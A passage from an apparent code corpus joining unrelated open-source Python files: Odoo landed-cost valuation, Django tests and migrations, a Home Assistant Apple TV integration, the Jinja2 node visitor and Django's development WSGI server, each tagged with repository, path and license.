costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost
tot += valuation_line.additional_landed_cost
res = (tot == landed_cost.amount_total)
for costl in costcor.keys():
if costcor[costl] != costl.price_unit:
res = False
return res
def button_validate(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for cost in self.browse(cr, uid, ids, context=context):
if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context):
raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.'))
move_id = self._create_account_move(cr, uid, cost, context=context)
quant_dict = {}
for line in cost.valuation_adjustment_lines:
if not line.move_id:
continue
per_unit = line.final_cost / line.quantity
diff = per_unit - line.former_cost_per_unit
quants = [quant for quant in line.move_id.quant_ids]
for quant in quants:
if quant.id not in quant_dict:
quant_dict[quant.id] = quant.cost + diff
else:
quant_dict[quant.id] += diff
for key, value in quant_dict.items():
quant_obj.write(cr, uid, key, {'cost': value}, context=context)
qty_out = 0
for quant in line.move_id.quant_ids:
if quant.location_id.usage != 'internal':
qty_out += quant.qty
self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context)
self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
return True
def compute_landed_cost(self, cr, uid, ids, context=None):
line_obj = self.pool.get('stock.valuation.adjustment.lines')
unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context)
line_obj.unlink(cr, uid, unlink_ids, context=context)
towrite_dict = {}
for cost in self.browse(cr, uid, ids, context=None):
if not cost.picking_ids:
continue
picking_ids = [p.id for p in cost.picking_ids]
total_qty = 0.0
total_cost = 0.0
total_weight = 0.0
total_volume = 0.0
total_line = 0.0
vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context)
for v in vals:
for line in cost.cost_lines:
v.update({'cost_id': cost.id, 'cost_line_id': line.id})
self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context)
total_qty += v.get('quantity', 0.0)
total_cost += v.get('former_cost', 0.0)
total_weight += v.get('weight', 0.0)
total_volume += v.get('volume', 0.0)
total_line += 1
for line in cost.cost_lines:
for valuation in cost.valuation_adjustment_lines:
value = 0.0
if valuation.cost_line_id and valuation.cost_line_id.id == line.id:
if line.split_method == 'by_quantity' and total_qty:
per_unit = (line.price_unit / total_qty)
value = valuation.quantity * per_unit
elif line.split_method == 'by_weight' and total_weight:
per_unit = (line.price_unit / total_weight)
value = valuation.weight * per_unit
elif line.split_method == 'by_volume' and total_volume:
per_unit = (line.price_unit / total_volume)
value = valuation.volume * per_unit
elif line.split_method == 'equal':
value = (line.price_unit / total_line)
elif line.split_method == 'by_current_cost_price' and total_cost:
per_unit = (line.price_unit / total_cost)
value = valuation.former_cost * per_unit
else:
value = (line.price_unit / total_line)
if valuation.id not in towrite_dict:
towrite_dict[valuation.id] = value
else:
towrite_dict[valuation.id] += value
if towrite_dict:
for key, value in towrite_dict.items():
line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context)
return True
class stock_landed_cost_lines(osv.osv):
_name = 'stock.landed.cost.lines'
_description = 'Stock Landed Cost Lines'
def onchange_product_id(self, cr, uid, ids, product_id=False, context=None):
result = {}
if not product_id:
return {'value': {'quantity': 0.0, 'price_unit': 0.0}}
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
result['name'] = product.name
result['split_method'] = product.split_method
result['price_unit'] = product.standard_price
result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id
return {'value': result}
_columns = {
'name': fields.char('Description'),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'product_id': fields.many2one('product.product', 'Product', required=True),
'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')),
'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True),
'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]),
}
class stock_valuation_adjustment_lines(osv.osv):
_name = 'stock.valuation.adjustment.lines'
_description = 'Stock Valuation Adjustment Lines'
def _amount_final(self, cr, uid, ids, name, args, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = {
'former_cost_per_unit': 0.0,
'final_cost': 0.0,
}
result[line.id]['former_cost_per_unit'] = (line.former_cost / line.quantity if line.quantity else 1.0)
result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost)
return result
def _get_name(self, cr, uid, ids, name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.product_id.code or line.product_id.name or ''
if line.cost_line_id:
res[line.id] += ' - ' + line.cost_line_id.name
return res
_columns = {
'name': fields.function(_get_name, type='char', string='Description', store=True),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True),
'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True),
'product_id': fields.many2one('product.product', 'Product', required=True),
'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')),
'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')),
'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')),
'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', digits_compute=dp.get_precision('Account'), store=True),
'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')),
'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', digits_compute=dp.get_precision('Account'), store=True),
}
_defaults = {
'quantity': 1.0,
'weight': 1.0,
'volume': 1.0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
jpshort/odoo | addons/l10n_at/__init__.py | 438 | 1050 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) conexus.at
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
titasakgm/brc-stock | openerp/addons/sale_crm/report/__init__.py | 54 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sales_crm_account_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
nathanial/lettuce | tests/integration/lib/Django-1.3/tests/modeltests/get_object_or_404/tests.py | 92 | 2623 | from django.http import Http404
from django.shortcuts import get_object_or_404, get_list_or_404
from django.test import TestCase
from models import Author, Article
class GetObjectOr404Tests(TestCase):
def test_get_object_or_404(self):
a1 = Author.objects.create(name="Brave Sir Robin")
a2 = Author.objects.create(name="Patsy")
# No Articles yet, so we should get a Http404 error.
self.assertRaises(Http404, get_object_or_404, Article, title="Foo")
article = Article.objects.create(title="Run away!")
article.authors = [a1, a2]
# get_object_or_404 can be passed a Model to query.
self.assertEqual(
get_object_or_404(Article, title__contains="Run"),
article
)
# We can also use the Article manager through an Author object.
self.assertEqual(
get_object_or_404(a1.article_set, title__contains="Run"),
article
)
# No articles containing "Camelot". This should raise a Http404 error.
self.assertRaises(Http404,
get_object_or_404, a1.article_set, title__contains="Camelot"
)
# Custom managers can be used too.
self.assertEqual(
get_object_or_404(Article.by_a_sir, title="Run away!"),
article
)
# QuerySets can be used too.
self.assertEqual(
get_object_or_404(Article.objects.all(), title__contains="Run"),
article
)
# Just as when using a get() lookup, you will get an error if more than
# one object is returned.
self.assertRaises(Author.MultipleObjectsReturned,
get_object_or_404, Author.objects.all()
)
# Using an EmptyQuerySet raises a Http404 error.
self.assertRaises(Http404,
get_object_or_404, Article.objects.none(), title__contains="Run"
)
# get_list_or_404 can be used to get lists of objects
self.assertEqual(
get_list_or_404(a1.article_set, title__icontains="Run"),
[article]
)
# Http404 is returned if the list is empty.
self.assertRaises(Http404,
get_list_or_404, a1.article_set, title__icontains="Shrubbery"
)
# Custom managers can be used too.
self.assertEqual(
get_list_or_404(Article.by_a_sir, title__icontains="Run"),
[article]
)
# QuerySets can be used too.
self.assertEqual(
get_list_or_404(Article.objects.all(), title__icontains="Run"),
[article]
)
| gpl-3.0 |
VishvajitP/django-extensions | django_extensions/admin/filter.py | 16 | 1997 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.admin import FieldListFilter
try:
from django.contrib.admin.utils import prepare_lookup_value
except ImportError:
# django < 1.7
from django.contrib.admin.util import prepare_lookup_value
from django.utils.translation import ugettext_lazy as _
class NullFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '{0}__isnull'.format(field_path)
super(NullFieldListFilter, self).__init__(field, request, params, model, model_admin, field_path)
lookup_choices = self.lookups(request, model_admin)
self.lookup_choices = () if lookup_choices is None else list(lookup_choices)
def expected_parameters(self):
return [self.lookup_kwarg]
def value(self):
return self.used_parameters.get(self.lookup_kwarg, None)
def lookups(self, request, model_admin):
return (
('1', _('Yes')),
('0', _('No')),
)
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == prepare_lookup_value(self.lookup_kwarg, lookup),
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, []),
'display': title,
}
def queryset(self, request, queryset):
if self.value() is not None:
kwargs = {self.lookup_kwarg: self.value()}
return queryset.filter(**kwargs)
return queryset
class NotNullFieldListFilter(NullFieldListFilter):
def lookups(self, request, model_admin):
return (
('0', _('Yes')),
('1', _('No')),
)
| mit |
Zac-HD/home-assistant | homeassistant/components/media_player/apple_tv.py | 3 | 9307 | """
Support for Apple TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.apple_tv/
"""
import asyncio
import logging
import hashlib
import aiohttp
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK, SUPPORT_SEEK,
SUPPORT_STOP, SUPPORT_PLAY, SUPPORT_PLAY_MEDIA, SUPPORT_TURN_ON,
SUPPORT_TURN_OFF, MediaPlayerDevice, PLATFORM_SCHEMA, MEDIA_TYPE_MUSIC,
MEDIA_TYPE_VIDEO, MEDIA_TYPE_TVSHOW)
from homeassistant.const import (
STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_STANDBY, CONF_HOST,
STATE_OFF, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyatv==0.1.4']
_LOGGER = logging.getLogger(__name__)
CONF_LOGIN_ID = 'login_id'
CONF_START_OFF = 'start_off'
DEFAULT_NAME = 'Apple TV'
DATA_APPLE_TV = 'apple_tv'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_LOGIN_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_START_OFF, default=False): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the Apple TV platform."""
import pyatv
if discovery_info is not None:
name = discovery_info['name']
host = discovery_info['host']
login_id = discovery_info['hsgid']
start_off = False
else:
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
login_id = config.get(CONF_LOGIN_ID)
start_off = config.get(CONF_START_OFF)
if DATA_APPLE_TV not in hass.data:
hass.data[DATA_APPLE_TV] = []
if host in hass.data[DATA_APPLE_TV]:
return False
hass.data[DATA_APPLE_TV].append(host)
details = pyatv.AppleTVDevice(name, host, login_id)
session = async_get_clientsession(hass)
atv = pyatv.connect_to_apple_tv(details, hass.loop, session=session)
entity = AppleTvDevice(atv, name, start_off)
yield from async_add_entities([entity], update_before_add=True)
class AppleTvDevice(MediaPlayerDevice):
"""Representation of an Apple TV device."""
def __init__(self, atv, name, is_off):
"""Initialize the Apple TV device."""
self._atv = atv
self._name = name
self._is_off = is_off
self._playing = None
self._artwork_hash = None
@callback
def _set_power_off(self, is_off):
self._playing = None
self._artwork_hash = None
self._is_off = is_off
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
if self._is_off:
return STATE_OFF
if self._playing is not None:
from pyatv import const
state = self._playing.play_state
if state == const.PLAY_STATE_NO_MEDIA:
return STATE_IDLE
elif state == const.PLAY_STATE_PLAYING or \
state == const.PLAY_STATE_LOADING:
return STATE_PLAYING
elif state == const.PLAY_STATE_PAUSED or \
state == const.PLAY_STATE_FAST_FORWARD or \
state == const.PLAY_STATE_FAST_BACKWARD:
# Catch fast forward/backward here so "play" is default action
return STATE_PAUSED
else:
return STATE_STANDBY # Bad or unknown state?
@asyncio.coroutine
def async_update(self):
"""Retrieve latest state."""
if self._is_off:
return
from pyatv import exceptions
try:
playing = yield from self._atv.metadata.playing()
if self._has_playing_media_changed(playing):
base = str(playing.title) + str(playing.artist) + \
str(playing.album) + str(playing.total_time)
self._artwork_hash = hashlib.md5(
base.encode('utf-8')).hexdigest()
self._playing = playing
except exceptions.AuthenticationError as ex:
_LOGGER.warning('%s (bad login id?)', str(ex))
except aiohttp.errors.ClientOSError as ex:
_LOGGER.error('failed to connect to Apple TV (%s)', str(ex))
except asyncio.TimeoutError:
_LOGGER.warning('timed out while connecting to Apple TV')
def _has_playing_media_changed(self, new_playing):
if self._playing is None:
return True
old_playing = self._playing
return new_playing.media_type != old_playing.media_type or \
new_playing.title != old_playing.title
@property
def media_content_type(self):
"""Content type of current playing media."""
if self._playing is not None:
from pyatv import const
media_type = self._playing.media_type
if media_type == const.MEDIA_TYPE_VIDEO:
return MEDIA_TYPE_VIDEO
elif media_type == const.MEDIA_TYPE_MUSIC:
return MEDIA_TYPE_MUSIC
elif media_type == const.MEDIA_TYPE_TV:
return MEDIA_TYPE_TVSHOW
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self._playing is not None:
return self._playing.total_time
@property
def media_position(self):
"""Position of current playing media in seconds."""
if self._playing is not None:
return self._playing.position
@property
def media_position_updated_at(self):
"""Last valid time of media position."""
state = self.state
if state == STATE_PLAYING or state == STATE_PAUSED:
return dt_util.utcnow()
@asyncio.coroutine
def async_play_media(self, media_type, media_id, **kwargs):
"""Send the play_media command to the media player."""
yield from self._atv.remote_control.play_url(media_id, 0)
@property
def media_image_hash(self):
"""Hash value for media image."""
return self._artwork_hash
@asyncio.coroutine
def async_get_media_image(self):
"""Fetch media image of current playing image."""
return (yield from self._atv.metadata.artwork()), 'image/png'
@property
def media_title(self):
"""Title of current playing media."""
if self._playing is not None:
if self.state == STATE_IDLE:
return 'Nothing playing'
title = self._playing.title
return title if title else "No title"
@property
def supported_features(self):
"""Flag media player features that are supported."""
features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PLAY_MEDIA
if self._playing is None or self.state == STATE_IDLE:
return features
features |= SUPPORT_PAUSE | SUPPORT_PLAY | SUPPORT_SEEK | \
SUPPORT_STOP | SUPPORT_NEXT_TRACK | SUPPORT_PREVIOUS_TRACK
return features
@asyncio.coroutine
def async_turn_on(self):
"""Turn the media player on."""
self._set_power_off(False)
@asyncio.coroutine
def async_turn_off(self):
"""Turn the media player off."""
self._set_power_off(True)
def async_media_play_pause(self):
"""Pause media on media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
state = self.state
if state == STATE_PAUSED:
return self._atv.remote_control.play()
elif state == STATE_PLAYING:
return self._atv.remote_control.pause()
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.pause()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.next()
def async_media_previous_track(self):
"""Send previous track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.set_position(position)
| apache-2.0 |
thrive-refugee/thrive-refugee | donors/migrations/0005_auto_20141108_1219.py | 1 | 1067 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('donors', '0004_auto_20141108_1110'),
]
operations = [
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('when', models.DateField(default=datetime.date.today)),
('amount', models.DecimalField(max_digits=11, decimal_places=2)),
('memo', models.CharField(max_length=256, blank=True)),
('donor', models.ForeignKey(to='donors.Donor')),
],
options={
},
bases=(models.Model,),
),
migrations.RemoveField(
model_name='donor',
name='last_amount',
),
migrations.RemoveField(
model_name='donor',
name='last_donation',
),
]
| mit |
davidvon/pipa-pay-server | site-packages/jinja2/visitor.py | 1401 | 3316 | # -*- coding: utf-8 -*-
"""
jinja2.visitor
~~~~~~~~~~~~~~
This module implements a visitor for the nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD.
"""
from jinja2.nodes import Node
class NodeVisitor(object):
"""Walks the abstract syntax tree and call visitor functions for every
node found. The visitor functions may return values which will be
forwarded by the `visit` method.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `get_visitor` function. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
"""
def get_visitor(self, node):
"""Return the visitor function for this node or `None` if no visitor
exists for this node. In that case the generic visit function is
used instead.
"""
method = 'visit_' + node.__class__.__name__
return getattr(self, method, None)
def visit(self, node, *args, **kwargs):
"""Visit a node."""
f = self.get_visitor(node)
if f is not None:
return f(node, *args, **kwargs)
return self.generic_visit(node, *args, **kwargs)
def generic_visit(self, node, *args, **kwargs):
"""Called if no explicit visitor function exists for a node."""
for node in node.iter_child_nodes():
self.visit(node, *args, **kwargs)
class NodeTransformer(NodeVisitor):
"""Walks the abstract syntax tree and allows modifications of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor functions to replace or remove the old node. If the return
value of the visitor function is `None` the node will be removed
from the previous location otherwise it's replaced with the return
value. The return value may be the original node in which case no
replacement takes place.
"""
def generic_visit(self, node, *args, **kwargs):
for field, old_value in node.iter_fields():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, Node):
value = self.visit(value, *args, **kwargs)
if value is None:
continue
elif not isinstance(value, Node):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, Node):
new_node = self.visit(old_value, *args, **kwargs)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
def visit_list(self, node, *args, **kwargs):
"""As transformers may return lists in some places this method
can be used to enforce a list as return value.
"""
rv = self.visit(node, *args, **kwargs)
if not isinstance(rv, list):
rv = [rv]
return rv
| apache-2.0 |
isaac-philip/loolu | common/django/core/servers/basehttp.py | 9 | 25759 | """
BaseHTTPServer that implements the Python WSGI protocol (PEP 333, rev 1.21).
Adapted from wsgiref.simple_server: http://svn.eby-sarna.com/wsgiref/
This is a simple server for use in testing or debugging Django apps. It hasn't
been reviewed for security issues. Don't use it for production use.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import re
import stat
import sys
import urllib
from django.utils.http import http_date
from django.utils._os import safe_join
__version__ = "0.1"
__all__ = ['WSGIServer','WSGIRequestHandler']
server_version = "WSGIServer/" + __version__
sys_version = "Python/" + sys.version.split()[0]
software_version = server_version + ' ' + sys_version
class WSGIServerException(Exception):
pass
class FileWrapper(object):
"""Wrapper to convert file-like objects to iterables"""
def __init__(self, filelike, blksize=8192):
self.filelike = filelike
self.blksize = blksize
if hasattr(filelike,'close'):
self.close = filelike.close
def __getitem__(self,key):
data = self.filelike.read(self.blksize)
if data:
return data
raise IndexError
def __iter__(self):
return self
def next(self):
data = self.filelike.read(self.blksize)
if data:
return data
raise StopIteration
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _formatparam(param, value=None, quote=1):
"""Convenience function to format and return a key=value pair.
This will quote the value if needed or if quote is true.
"""
if value is not None and len(value) > 0:
if quote or tspecials.search(value):
value = value.replace('\\', '\\\\').replace('"', r'\"')
return '%s="%s"' % (param, value)
else:
return '%s=%s' % (param, value)
else:
return param
class Headers(object):
"""Manage a collection of HTTP response headers"""
def __init__(self,headers):
if not isinstance(headers, list):
raise TypeError("Headers must be a list of name/value tuples")
self._headers = headers
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __setitem__(self, name, val):
"""Set the value of a header."""
del self[name]
self._headers.append((name, val))
def __delitem__(self,name):
"""Delete all occurrences of a header, if present.
Does *not* raise an exception if the header is missing.
"""
name = name.lower()
self._headers[:] = [kv for kv in self._headers if kv[0].lower()<>name]
def __getitem__(self,name):
"""Get the first header value for 'name'
Return None if the header is missing instead of raising an exception.
Note that if the header appeared multiple times, the first exactly which
occurrance gets returned is undefined. Use getall() to get all
the values matching a header field name.
"""
return self.get(name)
def has_key(self, name):
"""Return true if the message contains the header."""
return self.get(name) is not None
__contains__ = has_key
def get_all(self, name):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original header
list or were added to this instance, and may contain duplicates. Any
fields deleted and re-inserted are always appended to the header list.
If no fields exist with the given name, returns an empty list.
"""
name = name.lower()
return [kv[1] for kv in self._headers if kv[0].lower()==name]
def get(self,name,default=None):
"""Get the first header value for 'name', or return 'default'"""
name = name.lower()
for k,v in self._headers:
if k.lower()==name:
return v
return default
def keys(self):
"""Return a list of all the header field names.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all header values.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [v for k, v in self._headers]
def items(self):
"""Get all the header fields and values.
These will be sorted in the order they were in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return self._headers[:]
def __repr__(self):
return "Headers(%s)" % `self._headers`
def __str__(self):
"""str() returns the formatted headers, complete with end line,
suitable for direct HTTP transmission."""
return '\r\n'.join(["%s: %s" % kv for kv in self._headers]+['',''])
def setdefault(self,name,value):
"""Return first matching header value for 'name', or 'value'
If there is no header named 'name', add a new header with name 'name'
and value 'value'."""
result = self.get(name)
if result is None:
self._headers.append((name,value))
return value
else:
return result
def add_header(self, _name, _value, **_params):
"""Extended header setting.
_name is the header field to add. keyword arguments can be used to set
additional parameters for the header field, with underscores converted
to dashes. Normally the parameter will be added as key="value" unless
value is None, in which case only the key will be added.
Example:
h.add_header('content-disposition', 'attachment', filename='bud.gif')
Note that unlike the corresponding 'email.Message' method, this does
*not* handle '(charset, language, value)' tuples: all values must be
strings or None.
"""
parts = []
if _value is not None:
parts.append(_value)
for k, v in _params.items():
if v is None:
parts.append(k.replace('_', '-'))
else:
parts.append(_formatparam(k.replace('_', '-'), v))
self._headers.append((_name, "; ".join(parts)))
def guess_scheme(environ):
"""Return a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'
"""
if environ.get("HTTPS") in ('yes','on','1'):
return 'https'
else:
return 'http'
_hop_headers = {
'connection':1, 'keep-alive':1, 'proxy-authenticate':1,
'proxy-authorization':1, 'te':1, 'trailers':1, 'transfer-encoding':1,
'upgrade':1
}
def is_hop_by_hop(header_name):
"""Return true if 'header_name' is an HTTP/1.1 "Hop-by-Hop" header"""
return header_name.lower() in _hop_headers
class ServerHandler(object):
"""Manage the invocation of a WSGI application"""
# Configuration parameters; can override per-subclass or per-instance
wsgi_version = (1,0)
wsgi_multithread = True
wsgi_multiprocess = True
wsgi_run_once = False
origin_server = True # We are transmitting direct to client
http_version = "1.0" # Version that should be used for response
server_software = software_version
# os_environ is used to supply configuration from the OS environment:
# by default it's a copy of 'os.environ' as of import time, but you can
# override this in e.g. your __init__ method.
os_environ = dict(os.environ.items())
# Collaborator classes
wsgi_file_wrapper = FileWrapper # set to None to disable
headers_class = Headers # must be a Headers-like class
# Error handling (also per-subclass or per-instance)
traceback_limit = None # Print entire traceback to self.get_stderr()
error_status = "500 INTERNAL SERVER ERROR"
error_headers = [('Content-Type','text/plain')]
# State variables (don't mess with these)
status = result = None
headers_sent = False
headers = None
bytes_sent = 0
def __init__(self, stdin, stdout, stderr, environ, multithread=True,
multiprocess=False):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.base_env = environ
self.wsgi_multithread = multithread
self.wsgi_multiprocess = multiprocess
def run(self, application):
"""Invoke the application"""
# Note to self: don't move the close()! Asynchronous servers shouldn't
# call close() from finish_response(), so if you close() anywhere but
# the double-error branch here, you'll break asynchronous servers by
# prematurely closing. Async servers must return from 'run()' without
# closing if there might still be output to iterate over.
try:
self.setup_environ()
self.result = application(self.environ, self.start_response)
self.finish_response()
except:
try:
self.handle_error()
except:
# If we get an error handling an error, just give up already!
self.close()
raise # ...and let the actual server figure it out.
def setup_environ(self):
"""Set up the environment for one request"""
env = self.environ = self.os_environ.copy()
self.add_cgi_vars()
env['wsgi.input'] = self.get_stdin()
env['wsgi.errors'] = self.get_stderr()
env['wsgi.version'] = self.wsgi_version
env['wsgi.run_once'] = self.wsgi_run_once
env['wsgi.url_scheme'] = self.get_scheme()
env['wsgi.multithread'] = self.wsgi_multithread
env['wsgi.multiprocess'] = self.wsgi_multiprocess
if self.wsgi_file_wrapper is not None:
env['wsgi.file_wrapper'] = self.wsgi_file_wrapper
if self.origin_server and self.server_software:
env.setdefault('SERVER_SOFTWARE',self.server_software)
def finish_response(self):
"""
Send any iterable data, then close self and the iterable
Subclasses intended for use in asynchronous servers will want to
redefine this method, such that it sets up callbacks in the event loop
to iterate over the data, and to call 'self.close()' once the response
is finished.
"""
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
self.close()
def get_scheme(self):
"""Return the URL scheme being used"""
return guess_scheme(self.environ)
def set_content_length(self):
"""Compute Content-Length or switch to chunked encoding if possible"""
try:
blocks = len(self.result)
except (TypeError, AttributeError, NotImplementedError):
pass
else:
if blocks==1:
self.headers['Content-Length'] = str(self.bytes_sent)
return
# XXX Try for chunked encoding if origin server and client is 1.1
def cleanup_headers(self):
"""Make any necessary header changes or defaults
Subclasses can extend this to add other defaults.
"""
if 'Content-Length' not in self.headers:
self.set_content_length()
def start_response(self, status, headers,exc_info=None):
"""'start_response()' callable as specified by PEP 333"""
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None # avoid dangling circular ref
elif self.headers is not None:
raise AssertionError("Headers already set!")
assert isinstance(status, str),"Status must be a string"
assert len(status)>=4,"Status must be at least 4 characters"
assert int(status[:3]),"Status message must begin w/3-digit code"
assert status[3]==" ", "Status message must have a space after code"
if __debug__:
for name,val in headers:
assert isinstance(name, str),"Header names must be strings"
assert isinstance(val, str),"Header values must be strings"
assert not is_hop_by_hop(name),"Hop-by-hop headers not allowed"
self.status = status
self.headers = self.headers_class(headers)
return self.write
def send_preamble(self):
"""Transmit version/status/date/server, via self._write()"""
if self.origin_server:
if self.client_is_modern():
self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
if 'Date' not in self.headers:
self._write(
'Date: %s\r\n' % http_date()
)
if self.server_software and 'Server' not in self.headers:
self._write('Server: %s\r\n' % self.server_software)
else:
self._write('Status: %s\r\n' % self.status)
def write(self, data):
"""'write()' callable as specified by PEP 333"""
assert isinstance(data, str), "write() argument must be string"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
# If data is too large, socket will choke, so write chunks no larger
# than 32MB at a time.
length = len(data)
if length > 33554432:
offset = 0
while offset < length:
chunk_size = min(33554432, length)
